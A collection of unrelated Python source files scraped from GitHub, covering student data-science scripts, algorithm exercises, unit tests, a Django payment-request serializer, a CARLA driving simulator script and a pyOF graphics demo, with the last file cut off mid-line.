+{"seq_id":"12304965364","text":"# split the tweet data into test data and train data\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\nFILE_PATH = r'E:\\大���下\\CIS\\科研\\data2_tweet.csv' # 设置路径\r\ndf = pd.read_csv(FILE_PATH,encoding = \"utf-8\") # 读取文件\r\nX = df.text\r\ny = df.airline_sentiment\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,\r\ntest_size=0.4)\r\ntweet_for_train = {}\r\ntweet_for_train['text'] = X_train\r\ntweet_for_train['label'] = y_train\r\ntrain_data = pd.DataFrame(tweet_for_train)\r\ntweet_for_test = {}\r\ntweet_for_test['text'] = X_test\r\ntweet_for_test['label'] = y_test\r\ntrain_data = pd.DataFrame(tweet_for_train)\r\ntest_data = pd.DataFrame(tweet_for_test)\r\ntrain_data.to_csv('E:\\大三下\\CIS\\科研\\data2_tweet_train.csv',index=False)\r\ntest_data.to_csv('E:\\大三下\\CIS\\科研\\data2_tweet_test.csv',index=False)","repo_name":"Fir-lat/Happy_NLP","sub_path":"split_dataset.py","file_name":"split_dataset.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20126471300","text":"statesDict = {\n 'California' : 38802000,\n 'Texas' : 26956000,\n 'Florida' : 19893000,\n 'New York' : 19746000,\n 'Illinois' : 12880000,\n 'Pennsylvania' : 12787000,\n 'Ohio' : 11594000,\n 'Georgia' : 10097000,\n 'North Carolina': 9943964,\n 'Michigan' : 9909000,\n 'New Jersey' : 8938000\n}\n\n# Iterate using a 'for' loop\nfor state in statesDict:\n population = statesDict[state]\n print(state, population)\n\n# Iterate using items()\nknights = {'gallahad': 'the pure', 'robin': 'the brave'}\nfor key, value in knights.items():\n print(\"{}: {}\".format(key, value))\n","repo_name":"ScottBreitbach/DSC510","sub_path":"Wk8_Dictionaries-Tuples/Slides2.py","file_name":"Slides2.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27145956428","text":"# T(n) = O(N) S(N) = O(1)\r\n\r\n\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\ndef newNode(data):\r\n return Node(data)\r\n\r\ndef reverseList(head):\r\n prev=None\r\n n=head\r\n while n is not None:\r\n next=n.next\r\n n.next=prev\r\n prev=n\r\n n=next\r\n head=prev\r\n return head\r\n\r\ndef addOne(head):\r\n head = reverseList(head) #reverse linkedlist and add 1 to head\r\n k = head\r\n carry = 0\r\n prev = None\r\n head.data += 1\r\n # update carry for next calculation\r\n while(head != None) and (head.data > 9 or carry > 0):\r\n prev = head\r\n head.data += carry\r\n carry = head.data // 10\r\n head.data = head.data % 10\r\n head = head.next\r\n if carry > 0:\r\n prev.next = Node(carry)\r\n # Reverse the modified list\r\n return reverseList(k)\r\n\r\n#########ye push ko dekh re baba\r\ndef push(head,newdata):\r\n newnode=Node(newdata)\r\n newnode.next=head\r\n head=newnode \r\n\r\n\r\ndef printList(head):\r\n if not head:\r\n return\r\n while(head):\r\n print(\"{}\".format(head.data), end=\" \")\r\n head = head.next\r\n\r\n# Driver code\r\nif __name__ == '__main__':\r\n head = newNode(1)\r\n head.next = newNode(9)\r\n head.next.next = newNode(9)\r\n head.next.next.next = newNode(9)\r\n # head=push(1)\r\n # head=push(9)\r\n # head=push(9)\r\n # head=push(9)\r\n print(\"List is: \", end=\"\")\r\n printList(head)\r\n head = addOne(head)\r\n print(\"\\nResultant list is: \", end=\"\")\r\n 
printList(head)\r\n","repo_name":"shrutii2/Linked-List-in-Python","sub_path":"addonetolastnode.py","file_name":"addonetolastnode.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11451840066","text":"from sklearn.decomposition import PCA\r\nfrom sklearn import metrics\r\nfrom sklearn.feature_selection import RFECV\r\nfrom sklearn import linear_model\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn import decomposition\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.model_selection import cross_val_predict\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom statistics import mode\r\nfrom IPython.display import display, HTML\r\nimport timeit\r\n\r\nclass ResultSet():\r\n def __init__(self, title, predicted, actual, selector = None):\r\n self.title = title\r\n self.difference = []\r\n self.predicted = predicted\r\n self.actual = actual\r\n self.percentage = []\r\n self.score = metrics.r2_score(actual,predicted)\r\n self.selector = selector\r\n i = 0\r\n for act in actual:\r\n self.difference.append(predicted[i] - act)\r\n self.percentage.append(((self.difference[i])/(act))*100)\r\n i+=1\r\n\r\n\r\n\r\n\r\ndef corr_matrix():\r\n corr = data.corr()\r\n map = sns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True),\r\n square=True)\r\n map.set_xticklabels(labels, rotation=90)\r\n map.set_yticklabels(labels, rotation=0)\r\n sns.set(font_scale=1.5)\r\n #plt.show()\r\n\r\ndef boxplot(result, x_label = 'x',y_label = 'y',title= \"Figure\",save = False):\r\n sns.boxplot(result)\r\n plt.xlabel(x_label)\r\n plt.xticks(np.arange(-1000,2500,step=250))\r\n plt.xlim([-1000,2500])\r\n plt.ylabel(y_label)\r\n plt.title(title)\r\n plt.tight_layout()\r\n plt.minorticks_on()\r\n sns.swarmplot(result, color='orange')\r\n if save:\r\n plt.savefig(title+\".jpg\")\r\n #plt.show()\r\n\r\ndef jointplot(feature, comparator,mode = 'reg'):\r\n sns.jointplot(feature,comparator,kind=mode)\r\n plt.savefig(mode+'_'+feature.name+'_'+comparator.name+'.jpg')\r\n #plt.close()\r\n\r\ndef jointplot_all():\r\n for label in labels:\r\n for label_2 in labels:\r\n if label_2!=label:\r\n jointplot(data[label],data[label_2])\r\n jointplot(data[label], data[label_2],'kde')\r\n #plt.show()\r\n\r\ndef simple_plot(y_list,title = 'Figure', save = False):\r\n plt.figure()\r\n plt.plot(range(0, len(y_list)), y_list, 'ro')\r\n plt.plot([0, len(y_list)], [0, 0], linewidth=3)\r\n plt.title(title)\r\n if save:\r\n plt.savefig(title + \".jpg\")\r\n #plt.show()\r\n\r\ndef principal_component_analysis(n):\r\n pca = PCA(n_components=n)\r\n data = pca.fit_transform(x)\r\n predictions = cross_val_predict(clf, data, y, cv=10)\r\n print(metrics.r2_score(y, predictions))\r\n simple_plot(predictions,\"PCA n=\"+str(n))\r\n\r\ndef cv_predict(X,Y,algo):\r\n selector = RFECV(algorithms[algo], cv=10)\r\n selector.fit(X, Y)\r\n predictions = selector.predict(X)\r\n result_set = ResultSet(algo, predictions, Y, selector)\r\n return result_set\r\n\r\ndef algorithm_tests():\r\n #Stage one get results\r\n results = []\r\n rtable = pd.DataFrame()\r\n for algo in algorithms:\r\n rset = cv_predict(x,y,algo)\r\n results.append(rset)\r\n rtable[algo] = rset.predicted\r\n 
rtable[algo+'_difference'] = rset.difference\r\n rtable[algo+'_percent'] = rset.percentage\r\n print(algo)\r\n print('Optimal number of features is ', rset.selector.n_features_)\r\n print(\"r2 score:\", rset.score, '\\n')\r\n boxplot(rtable[algo + \"_percent\"], title=\"Boxplot (Percentage Error) \" +algo+ \" r2 score=\"+str(round(rset.score,4)) + \" Std=\"+str(round(np.std(rtable[algo + \"_percent\"]),2)), y_label='', save=True)\r\n plt.show()\r\n \r\n #get results > 100% error\r\n targetted = rtable[rtable[\"Linear Regression_percent\"]>90]\r\n print(\"Linear Regression targetted test: train with instances showing > 90% error\")\r\n print(\"Number of instances : \", len(targetted))\r\n\r\n #Fetch instances\r\n instances = data.iloc[targetted.index]\r\n #Join instances (for now just having a look to see if there's patterns in percentile error bands)\r\n targetted = targetted.join(instances)\r\n selector = RFECV(clf,cv=10)\r\n\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\nFor isolated target instances\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n for column in labels:\r\n print(column+\" : \\n\\t\",\"max=\"+str(max(targetted[column])),\"\\t\\t\\t\\t\\tmin=\"+str(min(targetted[column])),\"\\t\\t\\t\\t\\tmean=\"+str(np.mean(targetted[column])),\"\\t\\t\\t\\t\\tstd=\"+str(np.std(targetted[column])))\r\n #Get subset of targetted indices in dataset\r\n X = x[targetted.index.values]\r\n Y = y[targetted.index.values]\r\n rset = cv_predict(X,Y,\"Linear Regression\")\r\n boxplot(rset.percentage, title=\"Boxplot (Percentage Error) Overfitted Linear Regression model Std = \"+str(round(np.std(rset.percentage),2)), y_label='', save=True)\r\n print(\"r2 score: \",rset.score)\r\n file = open('results.html', 'w')\r\n file.write(targetted.to_html())\r\n file.close()\r\n file = open('percentages.html', 'w')\r\n p = []\r\n for result in rtable:\r\n if result.__contains__('percent'):\r\n p.append(result)\r\n file.write(targetted[p].to_html())\r\n file.close()\r\n\r\n\r\ndef knr_fit_predict(knr,instance):\r\n # Get the index array for nearest neighbours to instance\r\n neighbors = (knr.kneighbors(instance.reshape(1, -1))[1][0])\r\n # exclude the 0th value, which is the instance itself in our data\r\n neighbors = neighbors[1:]\r\n # array index training data\r\n X = x[neighbors]\r\n Y = y[neighbors]\r\n # fit model\r\n rfecv = RFECV(clf)\r\n clf.fit(X,Y)\r\n return clf.predict(instance.reshape(1, -1))\r\n\r\n'''Performs cross validationa across all instances in the data set using the n Nearest Neighbours'''\r\ndef param_KNearest_CV(n=178, weight=\"distance\"):\r\n results = []\r\n knr = KNeighborsRegressor(n_neighbors=n, weights=weight)\r\n knr.fit(x, y)\r\n for instance in x:\r\n #add prediction to list of results\r\n results.append(knr_fit_predict(knr,instance)[0])\r\n #make result set\r\n rs = ResultSet(\"Linear Regression\", results,y)\r\n return rs\r\n\r\ndef hpo_knn():\r\n results = []\r\n best = None\r\n best_n = 0\r\n #Distance weighting outperforms uniform\r\n weight = \"distance\"\r\n best_w = \"\"\r\n range_n = range(160 ,200,1)\r\n print(\"n values\", list(range_n))\r\n for n in range_n:\r\n rs = param_KNearest_CV(n,weight)\r\n if best is None:\r\n print(\"score=\", rs.score, \"weight=\", weight, \"n=\", n)\r\n best = rs\r\n best_n = n\r\n best_w = weight\r\n else:\r\n if best.score < rs.score:\r\n print(\"New best : score=\",rs.score,\"weight=\",weight,\"n=\",n)\r\n best = rs\r\n best_n = n\r\n best_w = weight\r\n results.append(rs.score)\r\n sns.pointplot(x=list(range_n),y=results)\r\n plt.show()\r\n 
boxplot(best.percentage,title=\"Best KNN n=\"+str(best_n)+\" w=\" +str(best_w)+\" score=\"+str(round(best.score,3))+\" std=\"+str(round(np.std(best.percentage),2)))\r\n plt.show()\r\n\r\ndef timeit_call():\r\n knr = KNeighborsRegressor(n_neighbors=178, weights=\"distance\")\r\n knr.fit(x, y)\r\n knr_fit_predict(knr,x[240])\r\n\r\ndef main():\r\n #Tests algorithms\r\n #algorithm_tests()\r\n\r\n #Time taken for single prediction\r\n #print(\"execution time\",timeit.timeit(timeit_call,number=1))\r\n\r\n #Hyper parameter optimization of KNN similar day fitting for K = number of similar days used\r\n #hpo_knn()\r\n\r\n\r\n #KNN Cross Validation\r\n rs = param_KNearest_CV()\r\n boxplot(rs.percentage,title=\"KNN Trained Linear Regression r2 score=\"+str(round(rs.score,4)) + \" Std=\"+str(round(np.std(rs.percentage),2)))\r\n plt.show()\r\n print(rs.score)\r\n\r\n\r\n'''Load Data and Call Main'''\r\n\r\n#Load CSV\r\ndata = pd.read_csv(\"fulldataset.csv\", delimiter=';')\r\n\r\n#Drop all NaN and non informative days\r\ndata = data.dropna(axis=0)\r\ndata = data[data['Power Generated'] != 0]\r\n#reset index for dropped rows\r\ndata.reset_index(inplace=True, drop=True)\r\n\r\n\r\n#Grab column names\r\nlabels = list(data.drop(\"Date\",axis=1).columns.values)\r\n\r\n#seperate data into target data and feature data\r\ny = data[\"Power Generated\"]\r\nx = data.drop([\"Power Generated\",\"Date\"],axis=1)\r\n\r\n\r\n#scale data\r\nscaler = StandardScaler()\r\nx=scaler.fit_transform(x)\r\n\r\nclf = linear_model.LinearRegression()\r\n\r\n\r\nalgorithms = {\"Linear Regression\": linear_model.LinearRegression() , \"Ridge Regression\" : linear_model.Ridge(), \"Lasso Regression\" : linear_model.Lasso(),\"ElasticNet\": linear_model.ElasticNet()}\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Sherkdavid/FYP","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14118676349","text":"'''\nnumpy_to_png.py\n\nConvert all numpy array files in the given file structure to png images\n\n'''\n\n\nimport sys, os \nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndef main(source_path, dest_path):\n for root, dirs, files in os.walk(source_path):\n pid = os.path.basename(root)\n if not pid:\n continue\n result_person_dir = os.path.join(dest_path, pid)\n os.makedirs(result_person_dir, exist_ok = True)\n for file in files:\n result_matrix = np.load(os.path.join(root, file))\n png_file = file.split('.')[0] + '.png'\n plt.axes([0,0,1,1])\n plt.axis(\"off\")\n plt.imsave(os.path.join(result_person_dir, png_file), result_matrix, cmap='coolwarm')\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2])\n\n\n\n","repo_name":"milesizydorczak12/Fingerprint-Correlation","sub_path":"helpful_scripts/numpy_to_png.py","file_name":"numpy_to_png.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40833273601","text":"import os\r\nimport sys\r\nimport pandas \r\nimport argparse\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef DataV1(data):\r\n # Mean, Median, Mode for relative data: \r\n df_mean_elo_pre = data[[\"elo1_pre\", \"elo2_pre\"]].mean()\r\n df_mean_eloPreDiff = data[[\"eloPreDiff\"]].mean()\r\n df_mean_eloProbDiff = data[[\"eloProbDiff\"]].mean()\r\n print(df_mean_elo_pre)\r\n print(df_mean_eloPreDiff)\r\n 
print(df_mean_eloProbDiff)\r\n\r\ndef DataV2(data):\r\n    # individual overall score:\r\n    eloYes = 0\r\n    eloNo = 0\r\n\r\n    for row in range(data.shape[0]):\r\n        if data[\"binaryEloProb1\"][row] == data[\"result1\"][row]:\r\n            eloYes+=1\r\n        else: \r\n            eloNo+=1\r\n\r\n    print(eloYes, eloNo)\r\n    \r\n    ratingYes = 0\r\n    ratingNo = 0\r\n\r\n    for row in range(data.shape[0]):\r\n        if data[\"binaryRatingProb1\"][row] == data[\"result1\"][row]:\r\n            ratingYes+=1\r\n        else: \r\n            ratingNo+=1\r\n    print(ratingYes, ratingNo)\r\n\r\n    eloWrongRatingRightYes = 0\r\n    eloWrongRatingRightNO = 0\r\n\r\n    eloRightRatingWrongYes = 0\r\n    eloRightRatingWrongNO = 0\r\n\r\n    for row in range(data.shape[0]):\r\n        if (data[\"binaryEloProb1\"][row] == data[\"result1\"][row]) and (data[\"binaryRatingProb1\"][row] != data[\"result1\"][row]):\r\n            eloRightRatingWrongYes+=1\r\n        if data[\"binaryEloProb1\"][row] != data[\"result1\"][row]: \r\n            eloRightRatingWrongNO+=1\r\n    print(eloRightRatingWrongYes, eloRightRatingWrongNO)\r\n\r\n    eloRightRatingRightYes = 0\r\n    eloRightRatingRightNO = 0\r\n\r\n    for row in range(data.shape[0]):\r\n        if (data[\"binaryEloProb1\"][row] == data[\"result1\"][row]) and (data[\"binaryRatingProb1\"][row] == data[\"result1\"][row]):\r\n            eloRightRatingRightYes+=1\r\n        if (data[\"binaryEloProb1\"][row] != data[\"result1\"][row]) and (data[\"binaryRatingProb1\"][row] != data[\"result1\"][row]): \r\n            eloRightRatingRightNO+=1\r\n    print(eloRightRatingRightYes, eloRightRatingRightNO)\r\n\r\ndef main():\r\n    #get data file\r\n    parser = argparse.ArgumentParser(description='Data Mine Mark 1 Data Sets.')\r\n    parser.add_argument('log_file', help='Mark 1 Data log file to parse')\r\n    args = parser.parse_args()\r\n\r\n    log_file = args.log_file\r\n    #print(log_file)\r\n\r\n    #put into pandas\r\n\r\n    allData = pandas.read_excel(log_file)\r\n    binaryData = allData[[\"binaryEloProb1\", \"binaryEloProb2\", \"binaryRatingProb1\", \"binaryRatingProb2\", \"result1\", \"result2\"]]\r\n\r\n    DataV1(allData)\r\n    DataV2(binaryData)\r\n    \r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"rshaw11/hatsForBats","sub_path":"hatsForBats.py","file_name":"hatsForBats.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14625752107","text":"import unittest\nfrom sort_fractions import sort_fractions\n\nclass TestSortFractions(unittest.TestCase):\n\tdef test_when_sorting_ascending_and_denominators_are_equal(self):\n\t\tfractions = [(4, 5), (2, 5), (3, 5), (1, 5)]\n\n\t\tresult = sort_fractions(fractions, asc=True)\n\n\t\texpected = [(1, 5), (2, 5), (3, 5), (4, 5)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_descending_and_denominators_are_equal(self):\n\t\tfractions = [(4, 5), (2, 5), (3, 5), (1, 5)]\n\n\t\tresult = sort_fractions(fractions, asc=False)\n\n\t\texpected = [(4, 5), (3, 5), (2, 5), (1, 5)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_ascending_and_denominators_are_different(self):\n\t\tfractions = [(2, 3), (1, 2), (1, 3)]\n\n\t\tresult = sort_fractions(fractions)\n\n\t\texpected = [(1, 3), (1, 2), (2, 3)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_descending_and_denominators_are_different(self):\n\t\tfractions = [(2, 3), (1, 2), (1, 3)]\n\n\t\tresult = sort_fractions(fractions, False)\n\n\t\texpected = [(2, 3), (1, 2), (1, 3)]\n\t\tself.assertEqual(result, expected)\n\n\tdef test_when_sorting_with_multiple_fractions_and_without_asc_parameter(self):\n\t\tfractions = [(5, 6), (22, 78), 
(22, 7), (7, 8), (9, 6), (15, 32)]\n\n\t\tresult = sort_fractions(fractions)\n\n\t\texpected = [(22, 78), (15, 32), (5, 6), (7, 8), (9, 6), (22, 7)]\n\t\tself.assertEqual(result, expected)\n\nif __name__ == '__main__':\n\tunittest.main()","repo_name":"Boyko03/Python101","sub_path":"week_2/friday_tasks/fractions/test_sort_fractions.py","file_name":"test_sort_fractions.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2355795995","text":"# Garrett Jordan\n\nwords = []\n\n# Function to check if the word is an anagram\n# Creates lists from both strings and sorts them\ndef isAnAnagram(word, user):\n\twordList = list(word)\n\twordList.sort()\n\treturn (wordList == user)\n\n# Takes sorted input, filters words to words of same length\n# loops over filtered words and uses isAnAnagram function\ndef getAnagrams(user):\n\tlister = [word for word in words if len(word) == len(user) ]\n\tfor item in lister:\n\t\tif isAnAnagram(item, user):\n\t\t\tyield item\n\n# Another method of returning a list similar to original getAnagrams\n# Uses filter and a lambda expression to filter all words in the list that are \n# anagrams of the sorted word. Should be slower.\ndef getAnagrams2(user):\n\tlister = [word for word in words if len(word) == len(user) ]\n\tanagrams = list( filter((lambda x:isAnAnagram(x,user)), lister))\n\treturn anagrams\n\n# Sorts the user input\n# Returns sorted list\ndef sortInput(user):\n\twet = list(user)\n\twet.sort()\n\treturn wet\n\ndef test():\n\ta = sortInput('andrew')\n\tgetAnagrams(a)\n\ndef test2():\n\ta = sortInput('andrew')\n\tgetAnagrams2(a)\n\n\n# reads from files to list and closes file\n# Used the f.closed print to demonstrate\n# fact that with keyword executes block, closes file but\n# results in an object i.e. 
f is available outside block\n# Easily demonstrated by running script in ipython where when\n# exited f can still be accessed by typing f\nwith open('wordlist.txt', 'r') as f:\n\tallwords = f.readlines()\nprint(f.closed)\n\n# Creates a list of words from the files\n# Strips newlines\nfor x in allwords:\n\tx = x.rstrip()\n\twords.append(x)\ninp = 1\n\n# Takes input\n# while inp != \"99\":\n# \tinp = input(\"enter word:\")\n# \tblah = sortInput(inp)\n# \tresult = getAnagrams(blah)\n# \tprint(list(result))\n# \tprint(getAnagrams2(blah))\n\n\n\n\n\n#Fin\n","repo_name":"helmet33/python-intro","sub_path":"files3.py","file_name":"files3.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23974513609","text":"from rest_framework import serializers\r\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\r\n\r\n\r\nfrom merchant_api.payment_requests.models import PaymentRequest\r\nfrom merchant_api.bip32_ducatus import DucatusWallet\r\nfrom merchant_api.consts import DECIMALS\r\n\r\n\r\n\r\nclass PaymentRequestSerializer(serializers.ModelSerializer):\r\n    class Meta:\r\n        model = PaymentRequest\r\n        fields = ['shop', 'cart_id', 'original_amount', 'received_amount', 'duc_address', 'state', 'created_at',\r\n                  'transfer_state', 'remained_amount', 'transfer_tx']\r\n\r\n    def create(self, validated_data):\r\n        print('validated_data:', validated_data, flush=True)\r\n        shop = validated_data['shop']\r\n        cart_id = validated_data['cart_id']\r\n\r\n        shop_root_key = DucatusWallet.deserialize(shop.root_keys.key_public)\r\n        duc_address = shop_root_key.get_child(cart_id, is_prime=False).to_address()\r\n\r\n        validated_data['duc_address'] = duc_address\r\n        validated_data['original_amount'] *= DECIMALS['DUC']\r\n        validated_data['remained_amount'] = validated_data['original_amount']\r\n\r\n        return super().create(validated_data)\r\n\r\n    def is_valid(self, raise_exception=False):\r\n        if hasattr(self, 'initial_data'):\r\n            try:\r\n                obj = PaymentRequest.objects.get(**self.initial_data)\r\n            except (ObjectDoesNotExist, MultipleObjectsReturned):\r\n                return super().is_valid(raise_exception)\r\n            else:\r\n                self.instance = obj\r\n                return super().is_valid(raise_exception)\r\n        else:\r\n            return super().is_valid(raise_exception)\r\n\r\n    def to_representation(self, payment_info):\r\n        result = super().to_representation(payment_info)\r\n        return result\r\n","repo_name":"DucatusX/ducatus_merchant_api","sub_path":"merchant_api/payment_requests/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74664067074","text":"import glob\nimport os\nimport sys\nfrom weakref import ref\nimport carla\nimport random\nimport time\nimport numpy as np\n\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\n\n\nfrom cv_bridge import CvBridge\nimport cv2\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float64, Int16\nfrom PIL import Image as im\n\n\nglobal vehicle\nglobal steer\nglobal throt\n\ntry:\n    sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (sys.version_info.major,sys.version_info.minor,'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept:\n    pass\n\n\nrospy.init_node('carla_car', anonymous=True)\nimage_pub = rospy.Publisher(\"camera_feed\",Image,queue_size=10)\nstatic_image_pub = 
rospy.Publisher(\"static_camera_feed\",Image,queue_size=10)\nposx_pub = rospy.Publisher(\"posx\",Float64,queue_size=10)\nposy_pub = rospy.Publisher(\"posy\",Float64,queue_size=10)\nposphi_pub = rospy.Publisher(\"posphi\",Float64,queue_size=10)\nfeature_change_pub = rospy.Publisher(\"feature_change\",Int16,queue_size=10)\nbridge = CvBridge()\n\nglobal i\ni = 0\n\nglobal camera\n\nglobal orientation_camera\n\n\nglobal previous_posphi\nglobal dir_change\n\ndir_change = 0\n\nprevious_posphi = 0\n\ndef rotate_camera(dirr):\n global camera\n global vehicle\n r = camera.get_transform().rotation.yaw -vehicle.get_transform().rotation.yaw + dirr.data\n\n if abs(r) >= 160:\n r = 45\n \n if random.random() > 0.5:\n r = -r\n\n # print(r)\n camera.set_transform(carla.Transform(carla.Location(x=0,y=0,z=2.5),carla.Rotation(yaw= r)))\n\ndef compute_display(image, camera):\n\n global vehicle\n global previous_posphi\n global dir_change\n\n array = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (image.height, image.width, 4))\n\n array = cv2.cvtColor(array,cv2.COLOR_RGB2BGR)\n\n image_pub.publish(bridge.cv2_to_imgmsg(array, \"bgr8\"))\n\n # print('published image')\n\n\n camx = camera.get_transform().location.x\n camy = camera.get_transform().location.y\n camz = camera.get_transform().location.z\n camphi = camera.get_transform().rotation.yaw\n\n posx_pub.publish(camx)\n posy_pub.publish(camy)\n posphi_pub.publish(camphi)\n\n # print(\"runnig \",random.random())\n\n # print(previous_posphi-camphi)\n\n if abs(previous_posphi-camphi) > 1:\n dir_change = 1\n feature_change_pub.publish(1)\n \n else:\n dir_change = 0\n feature_change_pub.publish(0)\n\n previous_posphi = camphi\n\ndef compute_display_static(image):\n\n array = np.frombuffer(image.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (image.height, image.width, 4))\n\n array = cv2.cvtColor(array,cv2.COLOR_RGB2BGR)\n\n static_image_pub.publish(bridge.cv2_to_imgmsg(array, \"bgr8\"))\n\n\ndef main():\n global vehicle\n global steer\n global throts\n global camera\n\n pygame.init()\n display_surface = pygame.display.set_mode((300,300))\n pygame.display.set_caption('Keyboard controls')\n clock = pygame.time.Clock()\n \n client = carla.Client('localhost',2000)\n client.set_timeout(20)\n\n world = client.load_world('Town02')\n\n bplib = world.get_blueprint_library()\n vehicle_bp = random.choice(bplib.filter('vehicle.bmw.*'))\n transform = carla.Transform(carla.Location(x=-5,y=250,z=5),carla.Rotation(yaw=270))\n\n vehicle = world.spawn_actor(vehicle_bp,transform)\n\n camera_bp = bplib.find('sensor.camera.rgb')\n camera_bp.set_attribute('image_size_x','800')\n camera_bp.set_attribute('image_size_y','800')\n camera_bp.set_attribute('fov','90')\n \n\n camera_bp_static = bplib.find('sensor.camera.rgb')\n camera_bp_static.set_attribute('image_size_x','800')\n camera_bp_static.set_attribute('image_size_y','800')\n camera_bp_static.set_attribute('fov','90')\n \n \n camera_transform = carla.Transform(carla.Location(x=0,z=2))\n camera = world.spawn_actor(camera_bp,camera_transform, attach_to=vehicle)\n\n camera_static_transform = carla.Transform(carla.Location(x=0,z=1.7))\n\n\n\n camera_static = world.spawn_actor(camera_bp_static,camera_static_transform, attach_to=vehicle)\n \n camera.listen(lambda image: compute_display(image,camera))\n\n\n camera_static.listen(lambda image: compute_display_static(image))\n\n dirr_sub = rospy.Subscriber(\"servo_direction\",Float64,rotate_camera)\n\n \n # 
vehicle.set_autopilot(True)\n\n    while True:\n        steer = 0\n        throt = 0\n        rev = False  # default so 'rev' is always defined before the steering branches below\n\n        pygame.display.flip()\n        keys=pygame.key.get_pressed()\n\n        if keys[K_w]:\n            throt = 0.4\n            rev = False\n            vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n        if keys[K_s]:\n            throt = 0.4\n            rev = True\n            vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n        if keys[K_a]:\n            steer = -0.5\n            vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n        if keys[K_d]:\n            steer = 0.5\n            vehicle.apply_control(carla.VehicleControl(throttle=throt, steer=steer,reverse = rev))\n\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                return True\n        \n\nif __name__ == '__main__':\n    main()","repo_name":"RudeNinja/Multi-View-V-SLAM","sub_path":"Multi-View-V-SLAM-sarat/run_carla.py","file_name":"run_carla.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20828585449","text":"import pyOF as of\n\nclass Car:\n    def __init__(self):\n        self.acc=0\n        self.vel=0\n        self.geo = of.ofBoxPrimitive()\n        self.material = of.ofMaterial()\n        self.lightL = of.ofLight()\n        self.lightR = of.ofLight()\n\n    def setup(self):\n        self.material.setDiffuseColor( of.ofFloatColor.white )\n        self.lightL.setParent( self.geo )\n        self.lightR.setParent( self.geo )\n        self.lightL.move(-45,20, -51)\n        self.lightR.move(45, 20, -51)\n        self.lightL.tilt(-20)\n        self.lightR.tilt(-20)\n        self.lightL.setSpotlight()\n        self.lightR.setSpotlight()\n        self.lightL.setDiffuseColor( of.ofFloatColor.yellow)\n        self.lightR.setDiffuseColor( of.ofFloatColor.yellow)\n        self.lightL.setup()\n        self.lightR.setup()\n\n    def draw(self):\n        self.material.begin()\n        self.geo.draw()\n        self.material.end()\n        # self.lightR.draw()\n        # self.lightL.draw()\n\n    def update(self):\n        self.vel += self.acc\n        self.vel *= 0.9\n        self.acc *= 0.99\n        velVector = self.geo.getZAxis() * -1*self.vel\n        self.geo.move( velVector )\n\n    def brake(self):\n        self.acc -= 0.1\n    def accelerate(self):\n        self.acc += 0.1\n    def steer(self, dir):\n        self.geo.rotate(dir, 0,1,0)\n\nclass App(of.BaseApp):\n    def setup(self):\n        of.ofSetWindowTitle(\"ofNode Example01\")\n        of.ofBackground(80,100,150,255)\n        of.ofEnableSmoothing()\n        of.ofEnableDepthTest()\n        # of.ofEnableAlphaBlending()\n        # of.ofSetCircleResolution(50)\n\n        self.light1 = of.ofLight()\n        